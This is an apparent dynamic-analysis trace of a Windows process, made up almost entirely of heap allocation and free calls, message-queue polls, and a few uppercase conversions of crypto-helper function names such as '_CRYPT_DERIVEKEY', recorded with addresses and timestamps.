RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0235.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0235.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.684] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0235.684] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0235.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0235.684] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0235.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0235.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0235.685] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.685] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0235.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0235.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0235.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0235.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0235.767] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0235.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0235.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0235.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0235.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0235.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0235.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0235.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0235.770] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0235.770] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0235.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.771] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.771] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.771] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0235.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0235.771] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.771] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.771] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0235.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0235.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 